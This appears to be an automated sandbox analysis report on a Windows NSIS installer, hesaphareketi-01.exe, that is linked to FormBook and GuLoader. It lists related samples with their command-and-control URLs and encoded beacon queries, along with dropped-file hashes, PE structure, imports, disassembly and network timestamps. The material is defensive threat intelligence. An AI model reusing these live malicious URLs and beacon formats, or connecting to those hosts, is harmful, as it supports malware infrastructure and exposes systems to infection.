                                                    37.97.254.27New_Order.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/fdo5/?540H2x=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&fXUX=ShJ8DFcXvtj84pw
                                                    PO_YTWHDF3432.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/ahec/
                                                    PO_CCTEB77.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/ahec/?KHcH=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+zzorQEnBYkPkOfg==&Vjk=-N-tntX
                                                    Fpopgapwdcgvxn.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.kermisbedrijfkramer.online/ao65/?3f94p=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&ojq4i=mFNh5n78I22D3DgP
                                                    Product_Specs.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.wrautomotive.online/ur4g/?vxM0=G80Xg2gxjV&eh=GM1abjaFQeRWF1TbL/6IPq6IQ8Zq6L6A/eGtDh+rzhSfkUEKySbsXXOahwAFIXwkymySVlBBxGC7SDgkYy5RlvrvRaU4SsaPnA==
                                                    PO_VCFGA1010.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/ahec/?TrRXYB=5igDJT3zPYxoznSYBBpd18gTi2dx8KCRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+z0orNAnxbm6AOaCZvJNva1SPD&NRpHp=DLPh_Z
                                                    25-23PJSM-653.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.rocsys.net/uaaq/?Zvo88=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA==&5j=JXHP5xY8
                                                    PAGAMENTO_INV-85732.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                    • www.qa-manny.com/cvps/?ojQxW=_LZhZtRhEB2XP&-Lkxp=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                    file.exeGet hashmaliciousFormBookBrowse
                                                    • www.wrautomotive.online/fdo5/?7F=tmpHADT4fdGVd6nnK8VfxTcjTEmAMjvmemW+C4Ol5iYH1IbYxa+keO9dRydEANAVQTW4GcRzv85KoC+8HtmJLO5vdlfv2fS0QQ==&zf7=WxIPUXb0
                                                    Order_confirmation,_Invoice.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.kermisbedrijfkramer.online/ao65/?Urwl=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/Y+YwQBdR3MSzENA==&S0GhC=_R-phJeXT
                                                    INV#761538.exeGet hashmaliciousFormBookBrowse
                                                    • www.qa-manny.com/cvps/?kDuhz=t6NP562HYH_&pf5=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==
                                                    137-AGROCHLOPECKI_OFFER_list.xlsGet hashmaliciousFormBookBrowse
                                                    • www.rocsys.net/g81o/?t8F43Dx=Xpn7ovWGDL38rcQsVj9M+fSKcj+67g3pDTSuqHneUyb3n+qAvdqStutd5ioDJ87L1Kdi6p0jXbywk+j2nUztgIlZl1ilwP64qP32EII=&xphPK=azPpsjMX1
                                                    NNL_PO_1023008.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.rocsys.net/uaaq/?w89D=LxmD0p&UX=ZvgtLzuC5J0fwHYxUOhDE7BocrPe2y3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09mUhv++5catqsVQ==
                                                    003425425124526.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.kermisbedrijfkramer.online/ao65/?GR0=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS1HIoJcoA9wm&IDK=RJBh5RS0IZO8zhrP
                                                    Document.exeGet hashmaliciousFormBookBrowse
                                                    • www.qa-manny.com/cvps/?Tb-PA8s8=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==&0H=BrFhG8npvv
                                                    Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                    • www.kermisbedrijfkramer.online/ao65/?2d=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/hhpQTPLNwMSzDew==&3fC=vZeTzRlX84SHE
                                                    Invoice.exeGet hashmaliciousUnknownBrowse
                                                    • www.wrautomotive.online/9hnx/?qjEABCG=x93wZY5flbcWgBQ+QBIan4Q/Fzujwl2X6zdiZc2Bln/4Iyn/0F+0HT2oZzLfP234arynxKxgoTzQXViUvY11cUD95//AJ74tDA==&KD=eYDR
                                                    Factura_1-000816pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • www.vdb2b.com/hedt/?iOOH=EEEIB&iC8-0=zKoVcsC5grZr6pX8QDgaiztoD/aYyGD3cWBaSuIr6nSXyRLF9phHpQybJRV7E4N8LdJP/dJhO/XvQgvS05+WXwT8k1ve1mAG6g==
                                                    PO-230803-S00.exeGet hashmaliciousFormBookBrowse
                                                    • www.carfactsandfigures.com/gpc9/?pfD=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoQOkRQ9xiXX9HyxRaD3/mCeI&28=XrcXTyOAOYd9aU4
                                                    Proof_Of_Payment_&_Proforma_Invoice.exeGet hashmaliciousFormBookBrowse
                                                    • www.carfactsandfigures.com/gpc9/?Qw=BKcV00kv5fthcsbc5kU6zPs22ZTUClXvYH44oRN9PBAu/J6uiY+GzzbdjWgGYpN/YmmZe7PBk+WcxYFhT8+AoWCpUiVji2f5FixRaDjUrieI&Cq=oXbgvbGl
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3041002, page size 2048, file counter 3, database pages 92, cookie 0x3a, schema 4, UTF-8, version-valid-for 3
                                                                                    Category:dropped
                                                                                    Size (bytes):188416
                                                                                    Entropy (8bit):0.9926780404836638
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:mavrNdl9bH9KTj8bGA/D3n0mCTV3U25G4qWlrrFB3nKIq9ucs:mavrbl9D9TDn0mCTV3PG43lrfKIq9ps
                                                                                    MD5:BE092D0FC1A86091764AABD40B25CB9E
                                                                                    SHA1:1372556BBC211898F393CC02C4285705AACAE3D7
                                                                                    SHA-256:3A83C0434C667BB30FD9D85D908E652A2569239BBD61079849F299409A48D545
                                                                                    SHA-512:EA6D16D484395A05D836A066248D355DA4C3C7A7B11CA612A87535395C6FDDDF1171624B6B45E41C12C284B5213CE9D22450E212ED0D195280653A4DF19F7892
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2781
                                                                                    Entropy (8bit):4.840941020704911
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:8BQ9pjaSuu0rGToZO5rtrQwgU1vXpAt1gjv4PoG:8BQbeSv0rGToc5rtr1Rv5AwG
                                                                                    MD5:7750DF455D3D7A43FAB608842DBC68BB
                                                                                    SHA1:75A12EE3889D27032ACEA11A69194F510E49CCAF
                                                                                    SHA-256:933A1AE85E63D6F80732C94FB04E624C0C0C30C33A1D260E6BCBBB6964EC9368
                                                                                    SHA-512:CE971CDD65C5256A2CB3E75D9BEA4C539C39D8EC892A032F2CCB082934C6AD6AB3DBB5B24B6317809B08D83F9511FB55B23BDB2D26CED8B1ACC422E89377181C
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2061
                                                                                    Entropy (8bit):4.657149228813482
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MKhcDmUp3MAx9x9Pxg8LuSNcedwv/f5JIh+61:MKedh9u4dK5q+c
                                                                                    MD5:815D1863FAE5184E2F64CDB3077B0713
                                                                                    SHA1:A5C38DF4631DC52B0F9C4391E13AD35C0196DE4D
                                                                                    SHA-256:CCF91454085A567DF894F4AB7466F165BB641DC627B388A8BF0275C60B9D562E
                                                                                    SHA-512:DE5F65FC66CA4660E3F5337CD3557B8DAC968AE7CF038FEC7E6F3C768979CCD91035D76799988AAFECD1E4C545ECD53E38DA54E13B76D2040A486B3B71157616
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):228797
                                                                                    Entropy (8bit):7.8433904827520795
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:q+1AzL6nQir4rKHfZXCSaaElUS+1i/t9BGsv/HFV36H5:bGqnZ0rmXCSaplUj149IsvP6Z
                                                                                    MD5:12C462CBA24C9BF13A8089C361D9A556
                                                                                    SHA1:8A4ABA3C2D4850AB44703AD391EB78B8BDADDF8C
                                                                                    SHA-256:C6B868D512822A2A57C080E5CF6E236DAB2FB3A7D6AD242A16EDC6E47E5204E4
                                                                                    SHA-512:4EF8125436BCECF3D2A3DB2DDE4AE9A193D537748DD586AE8C72BCF3C4FBA873E5CB2EC6A889ADB7355EA02BCD2D2CE22F0C2FBD34569651A38C218E754C1A18
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2054
                                                                                    Entropy (8bit):4.918068581931502
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:jC66pPwks6AiTHuu8Ben4KPItcYV/e3ZvECFbrily:ZEAiTqBWM6xECFbeQ
                                                                                    MD5:2CE1B6D5678CECBD0045D9F0BEA70012
                                                                                    SHA1:D218A03E35DC8C0467C7157853B836B14E17EE2B
                                                                                    SHA-256:02354809D06CDD8BC242C8C37C5F2E3BFFD7B083F3AA616B0CD1D70A1705DB84
                                                                                    SHA-512:065BF6683294248591CF7B58AA77881117D60759DC1F36C72D9A113D489F0C4C25D44CDFED9506531D8412724A3A83A68992236A7077C6AEA67437AC37DCFD3D
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1024
                                                                                    Entropy (8bit):4.8135073433567985
                                                                                    Encrypted:false
                                                                                    SSDEEP:24://RG1YukWldU0PBQbj9HaCTztr1kXOLxgs4/VQ5Hq:/EjpdU0PBQbhHltOXOLxjCK8
                                                                                    MD5:CCB8C7C324C0AFE87803AF762CD0587C
                                                                                    SHA1:CD632598A0452F28BE6AE7325D714AF31D177144
                                                                                    SHA-256:52816BC56069BF3514DA74567A1FDD7463183D11583D5F11B442960AA12B57D9
                                                                                    SHA-512:76A7504B1033BBE0A8C300D8414EA45D272E58AE56CE5E4917C24E9AF12FD17DE6B9B34F26D6BC312D8340484AD59CFD469FCEA4CA4BD354FFF468F0BF66CE94
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):602
                                                                                    Entropy (8bit):4.244948484312676
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:4SBV6H1OEwn+hdM1mAJ9wWkhuDUfwyIcFeHkw4ObFCPPe3Q7:6H1DwudiJ9wWSuDyIcQQG0ug
                                                                                    MD5:DD810F3906C78210F7E558F36089A573
                                                                                    SHA1:4A081A73FE779256588C821D8B31FED789A412CD
                                                                                    SHA-256:576235D08666124922DD80CB06400C07C201AD9EB0F00190E6131E743D87294C
                                                                                    SHA-512:B6780F3D56A715C1909FC3DA7C6A64B0F85CE98B5EAA06927F77A7530BE00A70619C26E369275CA7C2D457FD5C4A1F015B440B3C68697DD8BD14E2D2976BA07F
                                                                                    Malicious:false
                                                                                    Preview:kelspr ergometerets rectischiac dasyproctidae,ggeretter blindforsgene nomineret positivisternes imposable kremersite afdragende blystberierne guadagnini bindselets blokkedes..fortuneless eposser ajlebeholderes fremdateringerne euphemious monice,overemphasized amalgamatises deflate minirecessions fortllingens axwise runddyssen overvindelsers colonnades reissued recutting..miljfarligere holsom kommandanter undermundsproteserne banenettet tuberculosectorial ectethmoidal.krnen lubritorian arbejdsbesparelsr ritraadene profitmagere tnkepausen gonapophysal cuter nonobjectivism maray belay ynkeligheds..
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):7475
                                                                                    Entropy (8bit):4.881502534299953
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:yN7xnZoHP/U/sHWGWjcAZ9Nh2Nj4TqmuQ6dE5X9puv1sCCx:yDZoHP/PpMXNhgpp1dElUsJx
                                                                                    MD5:30730743350213A41627BECFB73A1045
                                                                                    SHA1:79F8918DE9FE680057FDC763ACAF3DA3B5915AC6
                                                                                    SHA-256:5E3B988A1303C6C25638764C9AA4D124FD890D13197A002AC0A85D4BFDD15652
                                                                                    SHA-512:7AC83ED4CC0BEFBD956D2501906118BFB52D48FE5DD49B53CC1406F985EC29B469117B22CE2ABB8E4403BD77AD3813ED2707014111A0B9CE74A4D6F877C151C7
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):7059
                                                                                    Entropy (8bit):4.909564947309597
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:Y0HDwecd6ktzCkqDYIKhTfRXXwhJOi1bFiuf+C:YoHcd6ktzCYIKFKPO85Df+C
                                                                                    MD5:81688D1154ABD744BD321B13DC13DB19
                                                                                    SHA1:E0AAA8567E16EB16A1EC2634F27B221B9321996C
                                                                                    SHA-256:BBA1EF4BC87F4DCB6CECB2F101EE7E1720836AB4EA9F9BFA357983A59343DA01
                                                                                    SHA-512:84FB78441857DF5E43AEAB9FC2B9B8632AD8E3339D37D5AE9B31BC23D25D82F6F96B9ADF839B27272581D4ED21436C30E26639EC6340D86330E6ADEA32218A07
                                                                                    Malicious:false
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):5632
                                                                                    Entropy (8bit):3.815222563094885
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:S46+/pTKYKxbWsptIpBtWZ0iV8jAWiAJCvxft2O2B8mzofjLl:zfuPbOBtWZBV8jAWiAJCdv2CmmL
                                                                                    MD5:376C1B784A3CCA9D10BA4CA5D8CB55D2
                                                                                    SHA1:AD12F8EBAB5B4B58EB7D5368469E82E2442B089F
                                                                                    SHA-256:5BEE24FEF5C0F643ADC7EE02CCB6E80A72A4EB30D9D326023AC03F0FFBC4E624
                                                                                    SHA-512:6F02F0D878C228DE114DEE6B0DF85152745B43893A252B2E9C309BA943EA56AB1EE678E42D9B0A89162E2BDA627D396C2933C02E1C42D0169AC6E05FF3AF4BBB
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: Liquidacion_por_Factorizacion_de_Creditos.exe, Detection: malicious
                                                                                    • Filename: Technical_Offer.exe, Detection: malicious
                                                                                    • Filename: justificantePago_es_180214093508pdf.exe, Detection: malicious
                                                                                    • Filename: 00158007317748300pdf.exe, Detection: malicious
                                                                                    • Filename: 475128640_20231129152352507pdf.exe, Detection: malicious
                                                                                    • Filename: recibo_vencimentopdf.exe, Detection: malicious
                                                                                    • Filename: Ticari_Hesap_#U00d6zetinizpdf.exe, Detection: malicious
                                                                                    • Filename: Transferencia-16.280,00_EURpdf.exe, Detection: malicious
                                                                                    • Filename: 84LQ5L8BA4.exe, Detection: malicious
                                                                                    Process:C:\Users\user\Desktop\hesaphareketi-01.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.659384359264642
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                                                    MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                                                    SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                                                    SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                                                    SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.740047363499213
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:hesaphareketi-01.exe
                                                                                    File size:368'795 bytes
                                                                                    MD5:e96bd1c59a8e67c4ab01a9327c98aab7
                                                                                    SHA1:184bfeb63316cb4aec59ee6038e1f0912541cbe9
                                                                                    SHA256:0b145928bcccd1f9510ef2744ef2487a38cdcdcc6b8595995c491c29f97f55e9
                                                                                    SHA512:a1afe26bcc1b47d7d26cb8b10c33bc853d6b7a3f57b27e20edfac2d98ea8aaf01244d0f22e2dc49910c5697002503f4e065b64a6fc6a1e609ef5cb9784968c87
                                                                                    SSDEEP:6144:6Q606xNlmkDnWv/NIPpWUELI8kMcpBPJi2IVWSF3E5jOWrakDkf3N:UFLWHopWUELI8kLpNJi2aT6OWr
                                                                                    TLSH:AE74021E3611D4E6F98883B02B3AAB0F599F6C4712460A0A3771777C6B39693CE1F9C5
                                                                                    Icon Hash:3298cc6662ccd83a
                                                                                    Entrypoint:0x403373
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x59759536 [Mon Jul 24 06:35:34 2017 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004080A8h]
                                                                                    call dword ptr [004080A4h]
                                                                                    and eax, BFFFFFFFh
                                                                                    cmp ax, 00000006h
                                                                                    mov dword ptr [00434EECh], eax
                                                                                    je 00007F4B24BE73F3h
                                                                                    push ebx
                                                                                    call 00007F4B24BEA689h
                                                                                    cmp eax, ebx
                                                                                    je 00007F4B24BE73E9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004082B0h
                                                                                    push esi
                                                                                    call 00007F4B24BEA603h
                                                                                    push esi
                                                                                    call dword ptr [00408150h]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007F4B24BE73CCh
                                                                                    push 0000000Ah
                                                                                    call 00007F4B24BEA65Ch
                                                                                    push 00000008h
                                                                                    call 00007F4B24BEA655h
                                                                                    push 00000006h
                                                                                    mov dword ptr [00434EE4h], eax
                                                                                    call 00007F4B24BEA649h
                                                                                    cmp eax, ebx
                                                                                    je 00007F4B24BE73F1h
                                                                                    push 0000001Eh
                                                                                    call eax
                                                                                    test eax, eax
                                                                                    je 00007F4B24BE73E9h
                                                                                    or byte ptr [00434EEFh], 00000040h
                                                                                    push ebp
                                                                                    call dword ptr [00408044h]
                                                                                    push ebx
                                                                                    call dword ptr [004082A0h]
                                                                                    mov dword ptr [00434FB8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0042B208h
                                                                                    call dword ptr [00408188h]
                                                                                    push 0040A2C8h
                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8608           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb4000          0x13970       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
.text   0x1000           0x65ef        0x6600    False     0.6750919117647058   data       6.514810500836391  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x8000           0x149a        0x1600    False     0.43803267045454547  data       5.007075185851696  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xa000           0x2aff8       0x600     False     0.5162760416666666   data       4.036693470004838  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata  0x35000          0x7f000       0x0       False     0                    empty      0.0                IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0xb4000          0x13970       0x13a00   False     0.5700512539808917   data       6.545380786031907  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb4358 | 0x8592 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 1.0004094285547172
RT_ICON | 0xbc8f0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.21120689655172414
RT_ICON | 0xc0b18 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.25975103734439836
RT_ICON | 0xc30c0 | 0x1a68 | Device independent bitmap graphic, 40 x 80 x 32, image size 6720 | English | United States | 0.2865384615384615
RT_ICON | 0xc4b28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.33724202626641653
RT_ICON | 0xc5bd0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.43155737704918035
RT_ICON | 0xc6558 | 0x6b8 | Device independent bitmap graphic, 20 x 40 x 32, image size 1680 | English | United States | 0.4924418604651163
RT_ICON | 0xc6c10 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.5460992907801419
RT_DIALOG | 0xc7078 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0xc7178 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0xc7298 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0xc7360 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0xc73c0 | 0x76 | data | English | United States | 0.7542372881355932
RT_VERSION | 0xc7438 | 0x1f4 | data | English | United States | 0.532
RT_MANIFEST | 0xc7630 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Dec 4, 2023 12:03:16.841908932 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.846159935 CET44349748142.251.40.129192.168.11.30
                                                                                    Dec 4, 2023 12:03:16.846359015 CET49748443192.168.11.30142.251.40.129
                                                                                    Dec 4, 2023 12:03:16.846378088 CET44349748142.251.40.129192.168.11.30
